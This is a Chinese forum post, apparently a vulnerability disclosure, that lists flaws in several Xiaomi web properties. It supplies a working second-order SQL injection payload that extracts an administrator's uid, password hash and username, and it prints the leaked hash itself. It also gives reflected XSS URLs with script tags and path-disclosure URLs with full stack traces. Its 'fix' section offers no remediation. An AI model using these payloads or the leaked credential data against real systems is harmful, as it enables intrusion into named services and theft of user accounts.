小米科技网站漏洞全集及修复方案
2883 点击·0 回帖
灯火互联
楼主
 |  | |
 | 简要描述:简单通过google搜索了一下,发现多个大小问题。 详细说明:1、米聊官方论坛二次注入。 http://www.discuz.net/thread-2354532-1-1.html 打补丁。 2、跨站脚本 http://mi.xiaomi.com/%E6%96%B9%E8%B6%85x<script>alert%28/ss/%29</script>/5 3、跨站脚本 http://mi.xiaomi.com/info.php?i=1;u=%CB%D5%B9%DA%BB%AA%27;e=354111841%40qq.com%27<script>alert%28/s/%29;</script> 4、程序出错暴路径 http://blog.xiaomi.com/wp-content/themes/xiaomi/ 5、程序出错暴路径 http://hd.xiaomi.com/index.php?action=rank;date=2011-11-13%27 漏洞证明:1、x',`subject`=(/*!select*/ concat(uid,'|',password,'|',username) from pre_common_member where groupid=1 limit 0,1),comment=' 4275|fd9d2eba79764c080a3c2f9d5ab7e4a7|麦兜在扫地 2、略 3、略 4、 Fatal error: Call to undefined function get_header() in /data/www/blog.xiaomi.com/wwwroot/wp-content/themes/xiaomi/index.php on line 7 5、 Fatal error: Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (2011-11-13\') at position 10 (\): Unexpected character' in /data/www/hd.xiaomi.com/action/rank.action.php:51 Stack trace: #0 /data/www/hd.xiaomi.com/action/rank.action.php(51): DateTime->__construct('2011-11-13\'') #1 /data/www/hd.xiaomi.com/action/rank.action.php(40): rank->index() #2 /data/www/hd.xiaomi.com/action/rank.action.php(98): rank->init() #3 /data/www/hd.xiaomi.com/web/index.php(100): require('/data/www/hd.xi...') #4 {main} thrown in /data/www/hd.xiaomi.com/action/rank.action.php on line 51 修复方案: 您懂得! | |
 |  |